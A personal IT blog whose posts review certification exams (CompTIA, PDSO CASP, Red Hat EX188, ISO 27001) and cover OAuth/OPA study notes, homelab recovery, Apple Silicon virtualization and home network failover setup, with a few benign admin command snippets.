Kilala.nl - Personal website of Tess Sluijter


CompTIA goes live with two new beta exams: SecurityX and Pentest+

2024-05-18 00:17:00

I guess most people know by now that I'm a sucker for beta-testing exams. CompTIA went live with not one, but two new betas!

They have published the exam objectives here.

I just spent five hours comparing the PT0-002 and PT1-003 objectives. The changes to Pentest+ are pretty extensive: many small details were swapped out, and two big areas shifted. There is much less focus on mobile (app) pentesting and much more focus on the SDLC and containers.

Here's my comparison. It shows which objectives were carried over from 002 to 003, but also which were added (green) or removed (red).



MCCT (Modern Classroom Certified Trainer) done

2024-05-13 08:58:00

This weekend I had a few spare hours to laze around in my hammock. What better way to spend them, than to do some quick brushing up on my training skillset?

Logical Operations have a training and certification they call MCCT: Modern Classroom Certified Trainer. It's currently discounted to $95, including the exam and cert.

MCCT is very clearly targeted at trainers who need to migrate from classroom to digital teaching. The training and certification do not go into didactics or curriculum creation; it's purely about achieving success in digital / remote / asynchronous training.

MCCT is by no means a replacement for CompTIA's now-retired CTT+. 

Training materials consist of 2.5h of video, a PDF book and slide decks. The exam is 48 multiple-choice questions, with 36/48 needed to pass. The exam is untimed, unproctored and open book.

My opinions on the matter:

Jon's training impressed upon me once again the importance of community-building, especially in an async class. Yet again, it amazes me that Practical DevSecOps appear to actively discourage community-building in their trainings.



Rescuing my homelab

2024-05-10 17:12:00

It's been almost a year since I last fired up my homelab. I haven't needed the 20+ VMs since I did my Ansible and CDP exams, as I prepared for just about all the other exams on a smaller, local environment.

A few weeks back I decided to fire up my R710 again, to see if everything still works. It's antiquated and runs VMware ESXi 6.5.x. Since its boot drive is a USB flash drive, I was a bit worried.

Lo and behold, I am greeted by a pink/purple screen that says:

failed to mount boot tardisk

Whelp... I have some inkling of what that means and I don't like it. Unfortunately the Internet wasn't of much help either, as that exact error appeared only once, on a German forum.

After some messing about, I'm happy to learn that my USB boot drive still had a recovery option! Pressing <shift><r> when prompted pops me into recovery mode. It tells me I can restore a previous install (which curiously had the exact same OS version), which I did.

By the sounds of it, all my VMs are booting again. :)

Now to make a backup of that flash drive!
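In case anyone wants to do the same: here's a minimal sketch of imaging the stick from a Linux machine with dd. The device name /dev/sdX is a placeholder, so double-check it with lsblk before copying anything.

# identify the USB stick first; /dev/sdX below is a placeholder!
lsblk -o NAME,SIZE,MODEL,TRAN

# raw image of the whole stick to a file (run as root, with the stick unmounted)
dd if=/dev/sdX of=esxi-boot-$(date +%F).img bs=4M status=progress conv=fsync

Restoring is the same dd command with if= and of= swapped.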



Trying out two certification exams: CASA and Cloud+

2024-02-02 07:28:00

In 2020 I took the CV1-003 CompTIA Cloud+ beta. Back then I wasn't really impressed with the quality of the exam. Well, it's time for the next version!

A few weeks ago I took CV1-004 for $50, to see if it's better than last time. Yes, but no. 

The questions on the new beta were more diverse than last time. And I still like the exam objectives / curriculum. But in general, I wasn't a fan of the exam questions. I know CompTIA often has questions where you're not supposed to think from real-life experience, but this time around it's really pretty bad. You know that meme of grandma yelling "that's not how any of this works!"? Well, that was me.

The PBQs especially felt like CompTIA were struggling to come up with something that works. And if I have to see one more white-clouds-on-blue-sky stock photo, I'll scream.

Jill West, an instructor on CIN, wrote it pretty eloquently:

"That was a bizarre exam. Only one of the PBQs really seemed appropriate to the test [...] Some other questions seemed like someone was looking at the objectives to write their questions but didn't really understand the concepts; they just used several items from the objectives as "wrong" answers when those options really weren't congruent with each other [...]"

So yeah. If there's a student interested in learning about cloud computing, I would suggest they read the materials, but I wouldn't suggest they take the exam.

===

After passing PDSO's CASP API security exam, I thought I'd look at some of their competition. I'm still going through APISec University's courses (which seem good), but I also gave their CASA exam a quick shot. 

In short: I will definitely recommend their training materials to students, but not the CASA. CASA is:

  1. 100 questions
  2. Open book
  3. Unproctored
  4. Untimed
  5. ... and it rings in at $125

Points 2, 3 and 4 unfortunately mean that, from an employer's point of view, the certification isn't worth much, because there's no guarantee that whoever holds it didn't cheat in some way. That's basically my biggest critique of PDSO's exams as well (which share points 2 and 3, but not 4).

The questions on the test were well written, so that's something. They are a decent way for someone who's taken the APISecU classes to test themselves. And potential employers will simply need to do better BS-testing in interviews. :)



Book recommendation: Microservice APIs, by José Haro Peralta

2024-01-21 15:21:00

In the months leading up to my PDSO CASP studies I read José Haro Peralta's "Microservice APIs". On and off, between classes and between other things I was learning. It's been a long read, but I can heartily recommend it.

I can honestly say that José's excellent book taught me most of what I now know about how APIs work! And it certainly clarified a lot of things that also came up in CASP.

Before I read "Microservice APIs" I had a foundational grasp of how REST and SOAP APIs look from the outside, as a consumer. I'd used OpenAPI specs, I'd read through WSDL files and I'd made API calls over HTTP. But I never really understood how it all worked on the server side.

José's book makes all of that server side magic crystal clear!

The book explains foundational and deep technical aspects of building multiple interacting APIs, which together form the backend of an online coffee product shop. And José shows all of it! All the Python code to load the frameworks, to write the queries and to build the endpoints. All of the code needed for GraphQL and two different REST implementations. And even a bit of authentication and authorization! Heck, appendix C of the book turns out to have exactly what I was looking for when I wanted to learn about integrating OIDC and OAuth into the authorization checks of an API!

If you hadn't guessed yet: "A+ would recommend".



PDSO CASP exam done! Let's review!

2024-01-21 11:22:00

Almost a month ago I started my studies for PDSO CASP, or Practical DevSecOps - Certified API Security Professional. That's a whole lot of words! 

I've taken two PDSO classes and exams before: CDP in 2021 and CTMP in 2023.

Yesterday I took the exam and boy howdy, did I get off on the wrong foot! I thought I'd booked the exam to start at 0800, but when I was brushing my teeth at 0645 the exam instruction email arrived! My own fault, and luckily I was at my desk within fifteen minutes... I didn't miss any time, I was just a lot less relaxed than I'd hoped to be.

It was fun to do another hands-on hacking exam! Six hours of happy hacking! Having said that, I have one thing to nag about. 

The exam did not test anything new. PDSO themselves in their training materials always advise: (paraphrased) "if you do all the labs and take careful notes, you will do well on the exam". They said it with CASP, they said it with CTMP and with CDP. 

With CDP there was additional depth to the exam, insofar as you needed to apply concepts you had learned to new technology. For CASP that was not the case. And I understand why PDSO took this approach: CDP was about implementing CI/CD pipelines, while CASP is about attacking (pentesting?) APIs. And one does not "simply pentest" five different APIs in six hours' time.

In my feedback to PDSO (and I gave plenty of it) I suggested that they could make a proper competitor to APISecU's ASCP exam by creating a second, longer and more in-depth exam. If PDSO made CASE (certified API security expert) which lasts twelve hours and has you do proper recon and attacking, I'd be all over that!

In essence the difficulty level of PDSO CASP is not defined by the technical challenges, but by time management and by foundational understanding. If you didn't do the training and labs, or if you don't have prior API pentesting experience you will fail. And if you cannot do those five challenges in six hours, while collecting evidence (screenshots, logging, code), you will fail. 

Speaking of which: the reason my reporting went so well is that I adhere to the most important lesson I learned from BHIS and John Strand: "Document as you go."

You will need to be picky about how you attack the challenges and you will definitely need to timebox. In my case the challenges were worth 20, 20, 15, 25 and 20 points and I needed 80 out of 100 points to pass. Having said that...

The exam assignments are clear and complete, as is the list of requirements for your reporting. PDSO make it very clear how you will be scored and they give you every opportunity not to fail. 

The team at PDSO are very responsive. Support for the training and exam is arranged via MatterMost and you will always find someone from the team online. If there's a technical issue, they report on it very quickly and resolve it in good time.

Having said that, I am surprised at the lack of community building on MatterMost. They have 2500+ students on there and the community chat is very quiet. And every time that someone does ask a question about course contents, they are immediately approached by someone from PDSO to tackle the question in DMs. There is no community building or involvement. 

Then there's one final, big factor which I feel detracts from the professional value of the PDSO certifications: validation. 

At no point before, during or after my exam was my identity verified. There is no proctoring, no session recording, nothing. My exam could have been done by anyone. I could have used any method of cheating and they would not know. My report could have been written by anyone. 

This will automatically devalue the certification for prospective employers. Instead of relying on the certification body, the employer will need to apply their own bullshit detector to verify if the applicant actually has any API hacking experience. 

Mind you, this is not unique to PDSO. APISec University have the same problem with their CASA exam which is unproctored, unvalidated and open book. I haven't taken APISec's ASCP yet, so I don't know if that's proctored. 

...

About the CASP training itself? I liked it well enough and it did teach me quite a few new things. It's just that at a few points I really wish they'd gone more technically in-depth than they did. Don't get me wrong, they already go pretty deep on a lot of topics, but I wanted more. Case in point: I did two 6-8 hour deep dives on OAuth and on OAuth+OPA to really understand how a technical implementation in code would work. 

It was time and money well spent!



Learning more about OIDC, OAuth and OPA

2024-01-15 20:12:00

Almost a month ago, I did a deep dive on how OAuth really works, as part of my preparations for the PDSO CASP exam.

Well, it's time for another one! Because I really wanted to know how you would use OAuth in conjunction with OPA (open policy agent) to drive the access controls on your API and business logic. 

I spent another six hours watching videos and reading through sample code to put two and two together. Here are links to resources that really helped me.
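To make the interplay a bit more concrete: conceptually, the API (or its gateway) first validates the OAuth access token, then asks OPA for an authorization decision over OPA's REST API, passing the request and token claims as input. A minimal sketch with curl, assuming OPA runs locally on its default port 8181 and that a policy has been loaded under a hypothetical package called httpapi.authz:

# ask OPA for an allow/deny decision; the policy path and input fields are only illustrative
curl -s -X POST http://localhost:8181/v1/data/httpapi/authz/allow \
  -H 'Content-Type: application/json' \
  -d '{"input": {"method": "GET", "path": ["orders", "1234"], "claims": {"sub": "alice", "scope": "orders:read"}}}'

# a loaded policy answers with {"result": true} or {"result": false};
# an empty {} means the rule is undefined for that input

The nice part of this split is that the API code only asks "may this request proceed?", while all the actual policy logic lives in OPA's Rego rules.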



Why can't vendors just make practice exams, just like the real thing?

2023-12-31 13:29:00

On Discord someone asked why it's so hard for vendors to "just" make practice exams that are exactly like the real thing. To them, it seemed like an obvious market gap! And to be honest, who wouldn't want a proper test run while prepping for Security+, LPIC1 or even CISSP?!

Now, I'm no expert, but here's what I told'm...

Most importantly, it's because you absolutely have to blackbox the practice exam creation. There can never be any doubt whatsoever that you, as a vendor, stole copyrighted materials or lifted questions and concepts from the official materials.

You have to have proof of your process and show that none of your personnel have ever taken the real exam. This means you have to hire a group of SMEs (subject matter experts) and have them create a testbank of 2000+ questions which cover all of the exam objectives for that one exam. But they're not allowed to look at official materials ever; possibly not even the objectives themselves.

And then you have to do that ten-or-so times, to cover all the exams. So basically at that point, you are making a brand new exam and you're competing with Linux Foundation, LPI, ISC2, CompTIA, etc.

It costs a huge amount of money.

Since we're in an IT forum I can safely point you towards this, which is strikingly comparable... Look into how Compaq reverse engineered the IBM PC BIOS, so they could make IBM PC compatible devices. Very similar.

For the exam questions, taking the Compaq analogy, it would mean that you need to have a team that creates a very precise set of requirements and design decisions. Theoretically they could look at what CompTIA and other vendors do.

Then you would need that second team of actual SMEs to write those hundreds or thousands of questions, based on the specifications written by the first team.

And then possibly, you could get exams which are very close to what CompTIA does. 



Learning about OAuth

2023-12-27 20:33:00

OAuth is a topic that has popped up a few times in my certification studies (Security+, CISSP, CSC210), but in none of those cases did the curriculum go in-depth on how it works. As in: really, how do you implement it, what does it look like in action?

I'm currently going through PDSO's API security training, preparing for the exam. OAuth gets about twenty minutes of video in there and they do a relatively good job of explaining. But yet again, there are still a lot of details missing.

Today I spent five or six hours reading through the resources below, making a huge stack of flash cards so I can refresh what I learned at a later point in time. 

For those who might struggle a bit with OAuth and how it would be implemented in code, here's an absolutely great example of a Javascript SPA (single-page app).
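If it helps to see the moving parts without a framework in the way: the heart of the authorization code flow (with PKCE) is redirecting the user to the authorization endpoint and then exchanging the returned code for tokens. Here's a hedged sketch of that second step with curl; the endpoint and client values are made up, only the parameter names come from the OAuth 2.0 and PKCE specs (RFC 6749 and RFC 7636).

# exchange the authorization code for tokens
curl -s -X POST https://auth.example.com/oauth2/token \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -d grant_type=authorization_code \
  -d code=AUTH_CODE_FROM_THE_REDIRECT \
  -d redirect_uri=https://app.example.com/callback \
  -d client_id=my-spa-client \
  -d code_verifier=THE_ORIGINAL_RANDOM_VERIFIER

# the response is JSON with access_token, token_type, expires_in
# and, when OIDC is in play, an id_token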

I then also read:

I also had no clue whatsoever about how those links work, where you do something in a browser and it pops up an app on your smartphone, tablet or computer. I learned that's called app deep linking and it's something that's both really cool and that's had its share of vulnerabilities as well. This was a great read which taught me how the URI schemes for app deep links work and how they can be attacked.

EDIT:

Oh my gosh, the folks at Curity made a great 8-part mini training that introduces OIDC and OAuth. Parts 7 and 8 perfectly explain 90% of what I wanted to know when I started my research.



CompTIA ITF+ exam

2023-12-03 11:01:00

After my frustrating start with the exam check-in (started at 08:15, finished at 09:00), I did get to do the CompTIA ITF+ (IT Fundamentals) exam. 

Tess? Why do this most entry-level of junior exams? Two reasons:

  1. I'm test-running it for my students at ITVitae, to see if the curriculum and exam are decent.
  2. I've built a webshop selling heavily discounted CompTIA vouchers and wanted to test the payment process, by buying the cheapest voucher.

So what did I think? 

I like the curriculum / objectives. They cover a wide range of topics, which I feel most people in IT should really be familiar with.

The exam itself was decent, though I'm not a huge fan of how a lot of the questions were worded. In some cases the grammar felt a lot more clunky than I'm used to from Linux+, Pentest+, etc. 

I scored much lower than I'd expected! The range is 100-900 points, with a pass at 650. I scored 730, which suggests that I misread questions or that CompTIA wanted me to think about a question differently. Plus, I do believe that on one or two questions I got tripped up by the very weird wording.

Do I think ITF+ is worth it for the most junior students I will be teaching? Yes, the curriculum is worth it. But I do feel that the exam might be a bit frustrating for them. 



My first real frustrating encounter with OnVue remote testing

2023-12-03 10:46:00

Two screenshots of a photo app

Today I took CompTIA's ITF+ exam at my office, using PearsonVue's OnVue testing software. This has gone well for me 10+ times, but today it didn't.

What changed? I used a desktop Mac instead of my usual laptop. What else went wrong? The check-in process. 

Let's start with that last one: the check-in process.

This has gone perfectly well for me 10+ times. You visit https://mobile.onvue.com on your smartphone, you enter the exam ID and you go through the wizard to take photographs of yourself, your ID and the room. 

The big problem is that the "shutter" button to take the photograph went missing. It was impossible to take the photo.

In the screenshots above, you can see the problem: the shutter button simply isn't there.

This made it impossible to photograph my ID and to proceed with the check-in. 

I contacted the PearsonVue support team via chat and they did not understand my problem. They asked for error messages, or told me to use my phone (I was), or told me to try my laptop (I didn't have one). 

Why use a laptop? There is a secondary method of taking the photos inside the OnVue exam app itself. It uses your computer's camera for the photographs. This would have worked to some degree, were it not that I was using a desktop PC with a wired camera. 

Plus it turns out that the Logitech 720p camera I have is not good enough to take these pictures as it has fixed focus. 

After a lot of back and forth with support, I accidentally found out (by flicking the screen on my phone) that the camera shutter button is in fact on the ID page, but it's out of view. You have to scroll the layer with the overlay. That was 200% unintuitive.

Later on I was also informed that my Wacom pen-tablet is not a permitted peripheral; that was on me, I should have known. I quickly switched to an old mouse.

Lessons learned from today's OnVue exam:

The rest of the exam, after check-in? Zero technical problems. I'll write about ITF+ separately.



I didn't think starting a webshop would be this easy

2023-12-01 20:11:00

A few weeks ago my company became an official CompTIA Delivery Partner, which means that I can now also officially teach classes on their behalf. I've already taught Linux+ for a few years, at ITVitae, but that's using my own materials and the Bresnahan/Blum book.

One other benefit to this partner status is that we can purchase exam vouchers at a 20% discount. In this, I see an opportunity to help struggling newbies who want to break into IT, even if it's just a little.

In my life, I've been helped by a great number of people and thus I firmly believe in "lifting up" and in "paying it forward". If I can take a small financial hit in order to help people take their exams at a cheaper rate, I'll gladly do it.

Having no prior experience in running a webshop (aside from a few internship projects 25 years ago!), I looked for the nicest-yet-low-barrier solution. 

The Unixerius site is built using Rapidweaver, a macOS WYSIWYG editor which has made it very easy to quickly whip up a decent looking site. I spent about an hour researching affordable webshop options, only to be happily surprised by Ecwid.

Ecwid are a webshop SaaS provider who offer a full frontend + backend system. They integrate with the payment providers I would need for the European market (Paypal, SEPA and Stripe, which offers iDeal). Their management system is excellent. And their frontend natively integrates with Rapidweaver.

It took me roughly three hours to set everything up, from A to Z. And it all works very well; I was my own first customer, test-purchasing an ITF+ voucher.

I will not be doing any big marketing for this shop. It's intended to be a small way to help out struggling students. I'm not looking to piss off the big CompTIA partners by severely undercutting them on large volumes of sales.

Heck, I'm restricting voucher purchases to one-per-person, to prevent pissing off CompTIA themselves. :)



Study resources for ISC2's CC exam

2023-11-23 11:39:00

In the summer of 2022, ISC2 introduced what was then called their ELCC exam. These days it's just "CC": Certified in Cybersecurity. At the time I concluded that ISC2's CC is a decent curriculum and exam for people who need a foundational understanding of enterprise-level cybersecurity.

In October of 2022 and 2023 I ran in-house "study challenges" for my customer, with 10-20 people attempting to pass the CC exam within that one Cybersecurity Awareness Month (CSAM). When we started, all there was to study were the free video trainings from ISC2.

Since then, new and much better resources have become available!

Remember to never pay full price on Udemy! They run huge discounts very regularly.



I presented at WICCON about AppSec / DevSecOps

2023-11-01 11:48:00

me on stage

This was so much fun!

WICCON is an IT conference by women, for everybody, featuring a full cast of women presenting about their work! Besides volunteering with the Black Cat Society, I also submitted a CFP. My talk was accepted. :)

You can view all presentations on WICCON's Youtube channel.



Virtualization, Linux labs on Apple Silicon

2023-07-17 20:18:00

I've held off on spending money on a new Mac for a long, long time. I have two Macbook Airs from 2017, which are still holding up admirably for my studies and work. Honestly, their 8GB of RAM and aged i5 are still plenty good for most of my work. 

Sure, I did get an Asus laptop with a beefy Ryzen in there, for teaching purposes. But even that's an ultra-portable and nothing hugely expensive. 

I've had to bite the bullet though: the chances of me getting students with Apple Silicon laptops are growing. My current group at ITVitae has my first one and it's a matter of time before a commercial customer pops in with an M1 or M2. 

So, I got myself a second hand 2020 M1 Mac Mini from Mac Voor Minder. Good store, I'd highly recommend. 

I had hoped that, in the three years we've had the Apple Silicon systems out, virtualization would be a solved problem. Well... it's not really, if you want one of the big names. 

VirtualBox? Forget about it: its Apple Silicon build is still very much in beta and was useless to me. VMware Fusion supposedly works, but I didn't manage to get it to do anything for me. And I'm not paying for Parallels, because most likely my students won't either! I need cheap/free solutions.

Turns out there are two.

  1. UTM, which uses Qemu under the hood. It's brilliant. Looks spiffy, has good options and does both virtualization (aarch64) and emulation (many other architectures). It does not have an API and it does not work with Vagrant. But I love it. 
  2. You can also install Qemu via Homebrew and then use the vagrant-qemu plugin to build VMs (rough commands below). It works well, although it doesn't support all of Vagrant's niceties yet. One downside is that the number of aarch64 Qemu boxes on Vagrant Cloud is small.
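For option 2, getting started looks roughly like this. A sketch under the assumption that you use Homebrew and that a suitable aarch64 box exists for the vagrant-qemu provider; the box name below is a placeholder, not a recommendation.

# install Qemu and the third-party vagrant-qemu provider plugin
brew install qemu
vagrant plugin install vagrant-qemu

# initialise a project with an aarch64-capable box (placeholder name!)
vagrant init some-maintainer/debian-aarch64
vagrant up --provider=qemu
vagrant ssh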

I'm now rewriting the lab files for my classes, to make them work on M1/M2 ARM systems. I'm starting with the lab VM for my DevSecOps class and then moving onward to two small projects that I use in class. Updating my Linux+ class will take more work.

Maybe I should start making my own Vagrant box images. :)



Preparing for (and passing) Red Hat's EX188, specialist in containers

2023-06-24 12:55:00

It's been well over a decade since I started doing Red Hat certifications, back in the RHEL 6 era. Since then I've gone after many exams and certs, taking a few every year, though not limited to Red Hat stuff. For Red Hat I basically make sure to take a new one every 2.5-3 years, so I can officially retain my "RHCE" status from 2014.

After my frustrating encounter with EX413 (security, 2017) and the fun EX407 (Ansible, 2020), it was time again! Since my agenda and wishlist are so incredibly stuffed, I will admit that I took "the easy way out" in renewing my RHCE by taking EX188.

EX188 is the first exam in Red Hat's track for certifying on container administration and development. It's about using Podman/Docker to build and run containers in a local environment. No high availability, no Kubernetes or OpenShift... basically a big step back from my CKA exam from last year.
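To give an idea of the level: the day-to-day local container work the exam covers is of roughly this flavour. A hedged sketch, using a public image rather than anything from the actual exam:

# pull and run a throw-away web server locally, then poke at it
podman run -d --name web -p 8080:80 docker.io/library/nginx:alpine
curl -sI http://localhost:8080/ | head -n 1
podman logs web
podman stop web && podman rm web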

But, pragmatism has its place. This year I've got a lot of other plans for my own studies and my work as teacher and this was a solid and educational way to get to a goal quickly.

Preparations

To make sure I'm well enough prepared:

Testing from home

I still very much like that Red Hat will let you take their practical exams from home. Unfortunately they use a much clunkier setup than the likes of the Linux Foundation. Preparing to take CKA from home was dead simple; preparing for Red Hat Kiosk exams is a chore.

The e-book says my MacBook Air from 2017 should work, but it doesn't. So I used Dick's Lenovo gaming laptop again. It only works with the 2020-08 ISO, because of its built-in M970 GPU. I also had to buy a cheap Logitech webcam, because my Razer cam didn't work.

Important: make really, really sure that you test your computer fully, well before the scheduled exam date. You must do this.

The exam itself

I enjoyed it! It's 2.5 hours, for a handful of tasks. Red Hat advise you to first read through all assignments before starting, because one task may rely on another. Reading all tasks will take about fifteen minutes. I advise that you really do read all tasks before starting. 

The task descriptions for EX188 are good. They are thorough and detailed, and they give you all the information you need to succeed. I have two minor quibbles with the task texts.

  1. One choice of words that is repeated in each task is ambiguous (but you don't have to worry about it).
  2. One task had two lines in it that 100% contradict each other. They offer an impossible conflict. After discussing the conflict with the proctor, I followed their advice to use a logical approach which rules out the impossibility itself. 

I needed the full 2.5 hours for the exam. I had 85% of the work done after roughly 1.5 hours, but then needed the rest of the time to debug the final 15%.

Again, I really enjoyed the exam. It's well put together, not frustrating at all.



Setting up Internet failover on UDM Pro, with Teltonika RUT241

2023-04-21 18:37:00

It's no secret that I use Ubiquiti equipment for my networking. My office runs on a UDM Pro, which has been great for me. 

The UDM Pro performs well and runs stably, it has a great feature set and it's easy to manage (for someone who wants to spend little time managing their network). Heck, even site-to-site VPN for my security cameras was simple!

My main WAN connection comes from MAC3Park, my housing company. They recently had an outage on my Internet connection, which lasted a few days. That messes with my backups and a few of my business processes, so I want to have at least some form of alternative in place. 

Luckily, the UDM Pro also makes it dead simple to configure automatic failover or even load balancing across two WAN connections! It really is amazingly simple! Or it should be, as we'll see in a bit. 

As a second Internet connection, I looked into getting 4G/5G from my mobile provider. Ubiquiti have their own LTE/4G/5G solution, which looks awesome but is a bit expensive. For half the price, I got a Teltonika RUT241 aimed at IoT solutions.

Sure, the LAN port on the RUT241 is slower (10/100Mbit), but seeing how the 4G connection averages around 20MBit that'll be fine. That's also where the "should be simple" I mentioned earlier comes in. 

The RUT241 worked great with my laptop, but when hooking it up to the RJ45 SFP module on the UDM Pro, it just wouldn't go. No amount of changing settings would make it work. Very odd! There was no DHCP lease and even a statically assigned IP wouldn't let me connect to the Teltonika.

Turns out that, upon closer inspection, my vendor sent me the wrong SFP module :) I'd ordered the 1G model (which does 10/100/1000), but they sent me the 2.5G (which does 1000/2500/10000). The latter will not work with the Teltonika. 

Time to get that SFP replaced by my vendor and we'll be good to go!

EDIT:

Or even better! I could just switch my cabled connection from MAC3Park (which is 1G) to port 10 and switch the Teltonika to port 9 (which natively does 100/1000). So basically, switch the definitions of WAN1 and WAN2 around!

EDIT2:

That worked. 

I made port 9 WAN2 and port 10 WAN1. I switched the cables around and now port 9 happily runs at 100Mbit, connected to the Teltonika.

Even nicer: in bridge mode, port 9 gets the 4G IP address so it's perfectly accessible as intended. But in that same bridge mode, the RUT241 remains accessible on its static, private IP as well so you can still access the admin web interface. 

So if, for example, my internal LANs are 10.0.10.0/24 and the Teltonika's private IP is 10.0.200.1, I've set up a traffic management route which says that 10.0.200.0/24 is reachable via WAN2. That way I can manage the Teltonika web interface from inside my office LAN, even when it's in bridge mode. Excellent!

EDIT3:

I tested the setup! 

Setting the UDM Pro to failover between the connections works very well. Within 60 seconds, Internet connectivity was restored. It does seem that the dynamic DNS setup does not switch over quickly, so a site-to-site VPN will fail for a lot longer.

Setting the UDM Pro to load balancing didn't work so well. The connection remained down after I pulled WAN1.



PECB ISO/IEC 27001 Lead Implementer: training, examination and certification

2023-04-19 11:29:00

This month, I've put some time into formalizing my experience with the ISO 27001 standard for "Information Security Management Systems". That is, the business processes and security controls which an organization needs to have in place to be accredited as "ISO27001 certified"... which translates into: this organization has put the right things into place to identify, address and manage risk and to provide personnel and management with policies, standards and guidelines on how to securely operate their IT environment. 

It's a cliché that people in IT have a distaste for "auditing" and "compliance". And sure, I've never had much fun with it either! But I felt I was doing myself a disservice by not formalizing what I've learned over the past decades. Or to put it the other way around: making sure I properly learn the fundamentals means that I can better assist my customers in properly structuring their IT security.

So off I went, to my favored vendor of InfoSec trainings: TSTC in Veenendaal. :) 

They provide the PECB version of the ISO27001 LI training and examination. The PECB materials aren't awesome, but they get the job done. And yes, if you're a hands-on techie, then the material can be rather dreary. But overall I had a fun four days at TSTC, with a great class and a solid trainer. 

The exam experience was a bit different from what I'm used to with other vendors.

TLDR, in short:



CFR 410: quick follow-up

2023-03-29 21:41:00

As a quick follow-up to this week's post about CSC 210 and CFR 410: I've now also gone through the majority of the course book for CFR 410. 

Like with CSC, I'm of the opinion that the course book for CFR is solid. I might not like the CFR exam, but the book is good!



CertNexus CSC 210 and CFR 410

2023-03-24 10:27:00

About a month ago I re-sat CompTIA's Linux+ exam, to make sure I am still preparing my students properly for their own exams. I still like the Linux+ exam (which I first beta-tested in 2021) and I'm happy to say that my course's curriculum properly covers all "my kids" need to know.

This week I sat not one, but two exams. That makes four this year, so far. :D

Why the sudden rush, with two exams in a week? I'm applying to become a CertNexus Authorized Instructor, through an acceleration programme that CN are running. They invited professional trainers to prepare for and take their exams for free, so CN can expand their pool of international trainers.

I feel that's absolutely marvelous. What a great opportunity! I heartily applaud CertNexus for this step.

The first exam which I took was CSC-210: Cyber Secure Coder. The curriculum had a nice overlap with the secure coding / app hacking classes that our team taught at ${Customer}, which means it's a class I would feel comfortable teaching. It's not programming per se; it's about having a properly secure design and way of working when building your software. The curriculum is language agnostic, though the example projects are mostly in Python and NodeJS.

I went through the official book for CSC and I like the quality. I actually enjoyed it a lot more than CompTIA's style. I haven't gone through the slide decks yet, so I can't say anything about those yet. The exam, I really liked. The questions often tested for insight and when it asked to define certain concepts, it wasn't just dry regurgitation. 

I can definitely recommend CertNexus CSC to anyone who needs an entry-level training and/or certification for secure development. 

Now, CFR-410 (CyberSec First Responder) is a different beast. I took the beta back in 2021 and at the time I was not overly impressed. The exam has stayed the same: it still asks about outdated concepts and it still has dry fact-regurgitation questions. 

I haven't gone through the book and slides yet, I'll do that this weekend so I can update this post. 

I have contacted CertNexus to offer them feedback and help, so we can improve CFR. Simply complaining about it won't help anyone; I'd rather help them improve their product.

EDIT: CertNexus have indicated they will welcome any feedback I can provide them for CFR, so that's ace. I will work with them in the coming weeks. 



The value (or not) of Linux+

2023-03-18 19:30:00

On Discord, people frequently ask: "is Linux+ worth it?" Here's my take.

The value depends on your market and on what you get out of it. In the US and UK, CompTIA is a well-known vendor, but in other parts of the world they aren't. And either way, Linux+ itself is not very well known.

I teach at a local school to prep young adults for the Linux+ exam. The school chose Linux+ because they can get heavily discounted vouchers for the exams, versus LPI, LF and others. For the school it was a matter of money: they really don't have much money and every dollar helps. 

Personally, I feel that the Linux+ curriculum is pretty solid as far as Linux sysadmin certs go. The exam itself is also decent and the vendor is mature. 

So in this case the value you'll get is from learning Linux system administration pretty in-depth. You'll also get a slip of paper which some might recognize and others will go "*cool, you passed a cert exam, good job*" (in a positive sense).

Linux+ is not worthless, it's just worth less (when compared to LFCS, LPIC1 and RHCSA).



DevSecOps: who's responsible?

2023-03-04 08:20:00

Someone on Discord asked: "Question: Does DevSecOps type of work fall under ISSO's roles and responsibilities?"

That got me thinking. 

IMO: DevSecOps, like many things in InfoSec, is something everybody needs to get in on! 

Architects need to define reference designs and standards. The ISO needs to define requirements based on regulations, laws and industry standards. An AppSec team needs to provide the tooling. Another team needs to provide CI/CD pipeline integration for these tools. And yes, the devops squads themselves need to actually do stuff with all of the aforementioned things. Someone needs to provide training, someone needs to be doing vulnerability management. And so on.

One book on the subject which I heartily recommend, is the Application Security Program Handbook, by Derek Fisher.

I bought that book right after leaving my previous AppSec role, where we spent two years building an AppSec team that did a lot of things from that list. I was amazed by the book, because cover to cover it's everything we self-taught over those two years.



You've got your Security+. Now what?

2023-02-26 12:55:17

On /r/comptia and Discord, there are a lot of people hoping to break into cybersecurity. They get their Security+ (because CompTIA's marketing promises a lot of jobs), but... then what?

Here's something I told someone on Discord the other day.

CompTIA will have a big list of options in their marketing fluff, but as I said I personally don't believe Sec+ preps you for any particular roles.

That doesn't mean it's not valuable! Quite the opposite! Having passed Sec+ means you bring fundamental InfoSec knowledge to any role you'll work in, be that user support, systems administration, network operations, DevOps, IAM, risk management, or whatever.

Career-wise, it makes sense to define short- and long-term goals for yourself. Investigate what different jobs in your local market entail, what the work actually involves, and check their requirements.

${Deity}, I'm saying the things I hated hearing twenty years ago, but here we are.

Next to those goals, also investigate the options available to you in your local marketplace. Also take stock of your current set of experience and skills. This information will help you figure out what kind of tools are at your disposal to meet your goals.

For example, say that your long term goal is to have a hardcore technical role in cyber security. Like pen-tester maybe, DevSecOps engineer or cloud security engineer.

From that you would start figuring out which of those roles sounds best to you and what you need to learn to get there. This will help you define short-term goals... milestones, if you will.

For example, if you already have some prior IT experience and you've dabbled with programming and Linux, then you could aim for junior devops or sysadmin roles in the short term. If you've already done a lot of TryHackMe or HackTheBox, then aim for a junior pentesting or junior devsecops role.

Now, if you have zero IT experience, then you're going to have to take a different route. One option is to start way lower in the IT ladder, like IT support. Another option is to go for a soft-skills based role! Like user awareness training, or risk management.

Here's a very long Reddit thread about why it's hard to break into InfoSec right from the start.

Which reminds me of a solid tip: check your local market for MSSPs: managed security service providers. They are often in a position to train juniors with little IT experience into the job. They need warm bodies to take care of the low-level work influx and can help you build experience and knowledge on the job.



Preparing for Server+: labs?

2023-02-26 11:56:00

On the CompTIA sub-reddit, people often ask for labs to work through while prepping for an exam. For Linux+, I've made all the labs for my class freely available on Github. 

Server+ is a less common CompTIA exam, which focuses on sysadmin / data center admin roles. There's quite some overlap between A+, Linux+ and Security+; I kinda liked it!

Here are a few suggestions I gave for practicing for SK0-005 Server+.

Unfortunately a lot of the aspects of Server+ relate to actually working in a data center, so it'll be hard to have labs for those sections.

Most of objective 1 you will need actual hardware for. If you're in the US, you can check LabGopher to find gear for your homelab. Otherwise, check your local nerdery forums or just eBay. A Dell R410 or R420 with a PERC RAID controller will set you back 100-400 dollars, depending on specs and what's included.

If you're already in IT, you can also ask your server admin team if they'd be willing to show you the ropes for objective 1.

